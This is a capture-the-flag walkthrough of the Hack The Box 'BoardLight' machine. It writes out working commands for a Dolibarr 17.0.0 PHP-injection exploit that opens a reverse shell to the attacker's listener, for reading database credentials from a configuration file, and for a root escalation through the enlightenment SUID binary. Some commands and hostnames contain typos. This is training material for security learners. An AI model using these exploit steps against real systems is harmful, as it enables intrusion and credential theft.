BoardLight HTB Walkthrough

Welcome to another Hack the Box walkthrough. In this blog post, I have demonstrated how I owned the BoardLight machine on Hack the Box. Hack The Box is a cybersecurity platform that helps you bridge knowledge gaps and prepares you for cyber security jobs. If you are new to this blog, please don’t forget to like, comment, and subscribe to my YouTube channel and follow me on LinkedIn for more HTB walkthroughs and cybersecurity related contents.

About the Machine

The "BoardLight" machine is an introductory-level challenge on Hack The Box (HTB). It is an easy level Linux machine that features a `Dolibarr` instance vulnerable to [CVE-2023-30253](https://nvd.nist.gov/vuln/detail/CVE-2023-30253). This vulnerability is leveraged to gain access as `www-data`. After enumerating and dumping the web configuration file contents, plaintext credentials lead to `SSH` access to the machine. Enumerating the system, a `SUID` binary related to `enlightenment` is identified which is vulnerable to privilege escalation via [CVE-2022-37706]( https://nvd.nist.gov/vuln/detail/CVE-2022-37706) and can be abused to leverage a root shell.

These guides cover enumeration, vulnerability exploitation, and privilege escalation techniques Boardlight Walkthrough. The machine is considered very easy to root.

The first step in solving this machine is to connect the Kali Linux machine with Hack the Box server. To do this, I logged in into my HTB account and click “connect to HTB” I chose my server as EU and click on the “Download VPN” button. This downloaded a .ovpn extension file.

Once the .ovpn file has been downloaded, I created a folder on my desktop and moved it into the new folder named “BoardlightHTB”. Once the file has been moved, I opened the directory in my terminal by right-clicking and choosing the option “Open in terminal”. Once the terminal has been opened, I typed the following commands to establish a connection between my Kali Linux terminal and Hack the Box server.

sudo openvpn boardlight.ovpn

Once the connection was successful and the button "Connect to HTB" is green, the next step was starting the machine. Starting the machine automatically assign an IP of 10.10.11.11, after which I performed Nmap enumeration on the target machine IP address.

What is Nmap and how can it be used for enumeration?

Nmap is a versatile tool, often used for network enumeration, which is the process of gathering information about a network or system. It can identify device types, reverse DNS names, MAC addresses, and IP addresses of active hosts, aiding in network discovery and security auditing. Nmap can also reveal open TCP ports and exposed services, alongside operating system and version details. Furthermore, Nmap facilitates SSH enumeration, offering scripts for tasks like identifying authentication methods and detecting SSHv1 servers. The tool is fundamental in penetration testing, providing crucial insights during initial assessments.

Running the following Nmap command, it displayed all the open ports available at the target machine (10.10.11.11):

nmap -sCV -A 10.10.11.11

Afterward, I performed nmap enumeration, and found two open ports: 22/tcp and 80/tcp. The next step was performing the dns (subdomain) enumeration using either gobuster or ffuf. To perform enumeration using gobuster, I used the following command:

gobuster dns -d “boardlight.htb” -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -t 100

The gobuster DNS enumeration returned crm.boardlight.htb — I added this to my /etc/hosts file by running the following command:

sudo nano /etc/hosts

Another way to perform the dns (subdomain) enumeration is using ffuf, by running the following command:

ffuf -u http://boardlight.htb -H “Host:FUZZ.boardlight.htb” -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-20000.txt -fw 18

I found crm, therefore I am going to add it to the /etc/hosts file by running the following command:

sudo nano /etc/hosts

This will open the GNU interface and I will add the IP address 10.10.11.11 and also the domain name crm.board.htb. After I have successfully added this, I will open my FireFox browser and visit crm.board.light

The browser displayed a login page and I tried logging in with default credentials like admin as my username and admin as my password. Luckily, I was able to login into the CRM.

After I logged in, I noticed there are some certain restrictions to the type of actions that I can perform on the website as an administrator. Looking at the website login interface, I found out that the website crm.board.htb was running on Dolibarr 17.0.0, so I searched for the exploits and vulnerabilities associated with the version.

I found a GitHub repository for Dolibarr 17.0.0 CVE-2023–30253 which was a PHP Injection code vulnerability which allows malicious actors to get reverse shell by running a python file against default username and password using admin.

I clicked on the little copy icon to copy the GitHub link and then opened a new terminal inside the directory BoardLightHTB I created on my desktop and clone the GitHub repository by typing the following commands in the Linux terminal:

git clone https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253.git

This will download the repository inside the BoardLightHTB directory. The next step is navigating into the Exploit-for-Dollibarr-17.0.0-CVE-2023–30253 folder and to open a terminal inside the directory to run the following commands:

python3 exploit.py http://crm.board.htb admin admin 10.10.15.1 4444

Prior to running the python code, I launched a netcat listener at port 4444 and also run the ifconfig command to find the LIPADDRESS of my Kali Linux.

After running the ifconfig command, I got 10.10.15.1 as my machine IP address. Next, I set the netcat listener to allow connection from port 4444.

After setting up the netcat listener, I ran the python command to establish a reverse shell connection to http://crm.board.htb using admin as both the username and password, and 10.10.11.11 as the listening IPADDRESS and 4444 as the listening PORT.

After getting the reverse shell, I stabilized the shell by running the following python command:

python3 -c ‘import pty;pty.spwan(“/bin/bash)’ ---> This will stabilize the reverse shell ls ---------------> This will list all the files/directories cd ~/ ---------------> This will change the directory to root ls ---------------> This will list all the files/directories cd html ---------------> This will change the directory to html

I couldn’t find anything in the root folder directory apart from the html directory. Therefore, I changed my directory to home and also locate the conf.php file by running the following commands:

cd /home cat /var/www/html/crm.board.htb/htdocs/conf/conf.php

I found the database username and password in the conf.php file. I copied the database password to make further reference in the hacking exercise. Next, I am going to run the ssh command to obtain the shell as user larissa by typing the following command either in the previous shell or by opening a new terminal:

ssh larissa@board.htb or ssh larissa@10.10.11.11 to obtain the shell as larissa

ssh larissa@board.htb ---------------> allowed me to get the shell as larissa ls ---------------> I listed all the file/directory for user larissa cat user.txt ---------------> I read the user.txt file by typing cat user.txt

Hurry! I got my user flag. The next step is getting the root user flag, I searched for Dolibarr 17.0.0 vulnerability and found an exploit (Super User ID Vulnerability) related to this version.

To get started with the solution on getting the root flag, I used the following command to search for files with the setuid permission:

find / -type f -perm -u=s 2>/dev/null ---------------> This Linux find command is used to search for files with the setuid (SUID) permission set

Next, I read the proof of concept to better understand the vulnerability. In accordance with the vulnerability, the malicious actor will execute some certain commands.

to obtain/pop the root shell. These commands are:

mkdir -p /tmp/net mkdir -p “/dev/../tmp/;/tmp/exploit” echo “/bin/sh” > /tmp/exploit /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), “/dev/../tmp/;/tmp/exploit” /tmp///net

Next, I listed all the files/directories after obtaining the shell by running ls command. After that, I changed my directory to root by typing cd /root, then listed all the files/directories in the /root folder. There, I got my root.txt file sitting there.

To read the content of the root.txt file, I ran the following command:

cat root.txt

Hurray!! I got my root flag

If you enjoy reading my writeup and would want to get notification as soon as I make a new writeup, do not forget to subscribe to my YouTube channel and follow me on my other social media accounts. Thank you.

Subscribe to my YouTube channel: https://www.youtube.com/@BoltechTechnologies1

Follow me on LinkedIn: https://www.linkedin.com/in/isiaq-ibrahim-468588156/

Follow me on Twitter: https://x.com/Isiaq_Ibrahim99

Follow me on Twitter: https://x.com/BoltechNG

Follow me on Medium: https://medium.com/@ibrahimbolaji50.ib

Download my writeup here: https://drive.google.com/file/d/18hlkvTeOxM0YEpIgO3rzruU2qRFByDBK/view?usp=drive_link

This walkthrough was first published on Medium in August 2024, but was pulled down by Hack The Box and Medium. The reason was: I uploaded a spoiler which is in violation of the terms and agreement of Hack the Box. The walkthrough had 6 views and 3 reads on Medium and 888 views on YouTube.